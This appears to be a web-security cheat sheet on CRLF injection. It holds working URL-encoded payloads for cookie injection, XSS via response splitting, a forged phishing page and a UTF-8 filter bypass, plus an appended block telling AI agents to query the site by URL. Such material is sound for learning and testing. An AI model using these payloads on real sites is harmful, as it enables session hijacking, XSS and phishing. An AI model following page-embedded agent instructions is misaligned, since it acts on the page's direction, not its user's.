# CRLF

## #**What is CRLF injection?**

*CRLF injection* is a vulnerability that lets a malicious hacker inject carriage return (CR) and linefeed (LF) characters to change the way a web application works or to confuse its administrator. There are two main malicious uses for CRLF injections: *log poisoning* (also called *log injection, log splitting,* or *log forging)* and *HTTP response splitting*.

## Carriage Return Line Feed

> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

### Summary

* CRLF - Add a cookie
* CRLF - Add a cookie - XSS Bypass
* CRLF - Write HTML
* CRLF - Filter Bypass
* Labs
* References

### CRLF - Add a cookie

Requested page

```http
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
```

HTTP Response

```http
Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
```

### CRLF - Add a cookie - XSS Bypass

Requested page

```powershell
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
```

HTTP Response

```http
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0
```

### CRLF - Write HTML

Requested page

```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
```

HTTP response

```http
Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

<html>You have been Phished</html>
```

### CRLF - Filter Bypass

Using UTF-8 encoding

```http
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
```

Remainder:

* %E5%98%8A = %0A = \u560a
* %E5%98%8D = %0D = \u560d
* %E5%98%BE = %3E = \u563e (>)
* %E5%98%BC = %3C = \u563c (<)

## #**What is log poisoning?**

In a log poisoning attack based on CRLF injection, a malicious hacker injects CRLF chara​cters into web server log files to confuse both automatic log analysis systems and system administrators browsing the logs manually.

## CRLF\_Injection Example

* [ ] `http://www.example.com/example.php?id=` – starting a valid request to a page with a CRLF injection vulnerability.
* [ ] `%0d%0aContent-Length:%200` – a fake HTTP response header of `Content-Length: 0`. This causes the web browser to treat this response as terminated and start parsing the next response.
* [ ] `%0d%0a%0d%0aHTTP/1.1%20200%20OK` – the injected new response begins here with a double CRLF sequence followed by `HTTP/1.1 200 OK`.
* [ ] `%0d%0aContent-Type:%20text/html` – another fake HTTP response header: `Content-Type: text/html`. This is required for the browser to treat this data as HTML content.
* [ ] `%0d%0aContent-Length:%2025` – yet another fake HTTP response header: `Content-Length: 25`. This instructs the browser to parse only the next 25 bytes and discard any remaining data as junk, causing it to ignore the legitimate HTTP content sent by the web server.
* [ ] `%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E` – a double CRLF sequence signals that the headers are over and the response body starts. The injected page content is `<script>alert(1)</script>`, which causes the user’s browser to display an alert instead of the actual *example.php* page.

### Labs

* <https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection>

### References

* <https://salmonsec.com/cheatsheets/exploitation/crlf_injection>&#x20;
* <https://www.owasp.org/index.php/CRLF\\_Injection>
* <https://vulners.com/hackerone/H1:192749>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sallam.gitbook.io/sec-88/web-appsec/crlf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.